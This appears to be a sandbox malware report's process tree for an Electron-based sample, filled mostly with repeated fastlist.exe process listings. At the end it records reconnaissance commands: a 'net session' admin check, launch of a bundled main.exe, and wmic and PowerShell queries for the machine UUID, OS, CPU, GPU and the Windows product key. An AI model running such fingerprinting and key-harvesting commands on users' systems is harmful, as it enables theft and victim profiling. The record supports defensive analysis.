- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7620
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7008
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5588
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1060
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6512
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5292
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7948
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8112
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6344
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2640
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7148
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4156
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7392
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5204
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7464
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5484
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7496
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5872
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4524
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6672
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7660
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:740
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7912
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6324
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6760
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4308
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8004
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7576
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3744
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6132
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2532
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6408
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7676
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3300
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5776
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6248
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5744
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5832
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1524
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5916
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4648
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1504
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6564
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5372
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7648
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6580
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7200
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5784
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3836
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2680
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5344
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8024
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4500
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5596
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7724
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2156
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6376
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6904
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6160
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3304
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5376
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5860
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6576
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5272
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7072
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3192
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7688
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7888
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3020
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7508
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6960
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2712
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8000
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    PID:6980
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:6888
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\bind\main.exe"
    3⤵
    PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:5488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:7144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    3⤵
    PID:1760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic OS get caption, osarchitecture
      4⤵
      PID:4360
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    3⤵
    PID:1124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      4⤵
      PID:5864
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    3⤵
    PID:7344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4488
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:5848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:7624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:6772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
    3⤵
    PID:6320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
      4⤵
      PID:908
